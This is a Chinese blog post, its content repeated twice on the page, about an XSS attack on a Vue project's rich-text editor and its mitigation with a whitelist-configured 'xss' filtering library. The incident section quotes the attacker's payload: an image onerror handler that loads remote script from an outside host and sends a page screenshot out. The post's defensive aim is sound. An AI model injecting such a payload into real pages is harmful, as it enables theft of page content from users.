如何在VUE项目中有效应对并防范XSS攻击?

2026-04-03 08:231阅读0评论SEO教程
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计888个文字,预计阅读时间需要4分钟。

如何在VUE项目中有效应对并防范XSS攻击?

目录+前言+发现原因+自定义过滤规则+总结+前言+随着互联网的高速发展,信息安全问题已成为企业最关注的焦点之一,而前端则是引发企业安全问题的风险数据点。在移动互联网时代,+信息安全问题已成为企业最关注的焦点,前端是引发安全问题的风险数据点。

目录
  • 前言
  • 发现原因
  • 自定义过滤规则
  • 总结

前言

随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“查漏补缺”。

发现原因

一切的原因都归咎于富文本编辑器....

应需求将文本域修改成富文本编辑器支持用户直接粘贴图片遭到用户使用网络图片上传方式攻击

攻击代码1" onerror=s=createElement('script');body.appendChild(s);s.src='//x0.nz/nQqS';

在数据回显时,图片报错并执行onerror事件,导致当前页面被截图发送至指定邮箱

最开始解决办法是直接关闭富文本编辑器上传网络图片的方式,但是后续再次遭到此类攻击,攻击者使用“fiddler”修改参数达到同样效果

最终采用第三方防御XSS攻击插件并通过配置白名单解决,在提交以及拿到后端返回数据时进行过滤

插件中文文档地址:github.com/leizongmin/…

npm install xss import filterXSS from "xss"

自定义过滤规则

在调用 xss() 函数进行过滤时,可通过第二个参数来设置自定义规则:

options = {}; // 自定义规则 html = filterXSS('<script>alert("xss");</script>', options);

通过 whiteList 来指定,格式为:{'标签名': ['属性1', '属性2']}。不在白名单上的标签将被过滤,不在白名单上的属性也会被过滤。

let options = { stripIgnoreTagBody: true, // 不在白名单中的标签以及标签里面的内容直接删除 whiteList: { h1: ["style"], h2: ["style"], h3: ["style"], h4: ["style"], h5: ["style"], h6: ["style"], hr: ["style"], span: ["style"], strong: ["style"], b: ["style"], i: ["style"], br: [], p: ["style"], pre: ["style"], code: ["style"], a: ["style", "target", "href", "title", "rel"], img: ["style", "src", "title"], div: ["style"], table: ["style", "width", "border"], tr: ["style"], td: ["style", "width", "colspan"], th: ["style", "width", "colspan"], tbody: ["style"], ul: ["style"], li: ["style"], ol: ["style"], dl: ["style"], dt: ["style"], em: ["style"], cite: ["style"], section: ["style"], header: ["style"], footer: ["style"], blockquote: ["style"], audio: ["autoplay", "controls", "loop", "preload", "src"], video: [ "autoplay", "controls", "loop", "preload", "src", "height", "width", ], }, css: { // 因为上面白名单中允许了标签的style属性,所以需要防止攻击者使用此途径进行攻击 whiteList: { color: true, "background-color": true, width: true, height: true, "max-width": true, "max-height": true, "min-width": true, "min-height": true, "font-size": true, }, }, } content = filterXSS(content,options)

如何在VUE项目中有效应对并防范XSS攻击?

总结

到此这篇关于VUE项目中遇到XSS攻击的文章就介绍到这了,更多相关VUE项目XSS攻击内容请搜索自由互联以前的文章或继续浏览下面的相关文章希望大家以后多多支持自由互联!

标签:实战记录

相关推荐

39660如何在Ubuntu系统上成功升级到PHP 7.4版本?39677如何通过源码在CentOS上安装PHP7.2.4并添加swoole2.1.1扩展?39678如何安装PHP7的Redis扩展?39679Mac系统如何完美安装PHP7教程详细步骤?39689PHP 7.4的弱引用如何改写成长尾,以探究其深层应用机制?39691PHP5.9升级PHP7时,有哪些坑和php-fpm配置问题需要注意?39694如何编译PHP7的memcached扩展?39696如何安装php7的phalcon扩展?39699如何通过xhprof在php7中深入测试和优化PHP代码性能?39705如何正确安装Windows系统下的Apache服务器以配合PHP7环境?39706为什么Xdebug插件提示不支持PHP 7.0版本,这到底是怎么回事呢?39710Linux环境下如何安装PHP7.0?39712如何优化PHP7配置和代码实现极致性能?39720如何将CentOS系统中的PHP5版本升级到PHP7?39731如何配置PHP7环境并使用mysqli扩展连接到MySQL数据库?39736PHP7.0.x中哪些废弃功能需要改用新方法?

本文共计888个文字,预计阅读时间需要4分钟。

如何在VUE项目中有效应对并防范XSS攻击?

目录+前言+发现原因+自定义过滤规则+总结+前言+随着互联网的高速发展,信息安全问题已成为企业最关注的焦点之一,而前端则是引发企业安全问题的风险数据点。在移动互联网时代,+信息安全问题已成为企业最关注的焦点,前端是引发安全问题的风险数据点。

目录
  • 前言
  • 发现原因
  • 自定义过滤规则
  • 总结

前言

随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“查漏补缺”。

发现原因

一切的原因都归咎于富文本编辑器....

应需求将文本域修改成富文本编辑器支持用户直接粘贴图片遭到用户使用网络图片上传方式攻击

攻击代码1" onerror=s=createElement('script');body.appendChild(s);s.src='//x0.nz/nQqS';

在数据回显时,图片报错并执行onerror事件,导致当前页面被截图发送至指定邮箱

最开始解决办法是直接关闭富文本编辑器上传网络图片的方式,但是后续再次遭到此类攻击,攻击者使用“fiddler”修改参数达到同样效果

最终采用第三方防御XSS攻击插件并通过配置白名单解决,在提交以及拿到后端返回数据时进行过滤

插件中文文档地址:github.com/leizongmin/…

npm install xss import filterXSS from "xss"

自定义过滤规则

在调用 xss() 函数进行过滤时,可通过第二个参数来设置自定义规则:

options = {}; // 自定义规则 html = filterXSS('<script>alert("xss");</script>', options);

通过 whiteList 来指定,格式为:{'标签名': ['属性1', '属性2']}。不在白名单上的标签将被过滤,不在白名单上的属性也会被过滤。

let options = { stripIgnoreTagBody: true, // 不在白名单中的标签以及标签里面的内容直接删除 whiteList: { h1: ["style"], h2: ["style"], h3: ["style"], h4: ["style"], h5: ["style"], h6: ["style"], hr: ["style"], span: ["style"], strong: ["style"], b: ["style"], i: ["style"], br: [], p: ["style"], pre: ["style"], code: ["style"], a: ["style", "target", "href", "title", "rel"], img: ["style", "src", "title"], div: ["style"], table: ["style", "width", "border"], tr: ["style"], td: ["style", "width", "colspan"], th: ["style", "width", "colspan"], tbody: ["style"], ul: ["style"], li: ["style"], ol: ["style"], dl: ["style"], dt: ["style"], em: ["style"], cite: ["style"], section: ["style"], header: ["style"], footer: ["style"], blockquote: ["style"], audio: ["autoplay", "controls", "loop", "preload", "src"], video: [ "autoplay", "controls", "loop", "preload", "src", "height", "width", ], }, css: { // 因为上面白名单中允许了标签的style属性,所以需要防止攻击者使用此途径进行攻击 whiteList: { color: true, "background-color": true, width: true, height: true, "max-width": true, "max-height": true, "min-width": true, "min-height": true, "font-size": true, }, }, } content = filterXSS(content,options)

如何在VUE项目中有效应对并防范XSS攻击?

总结

到此这篇关于VUE项目中遇到XSS攻击的文章就介绍到这了,更多相关VUE项目XSS攻击内容请搜索自由互联以前的文章或继续浏览下面的相关文章希望大家以后多多支持自由互联!

标签:实战记录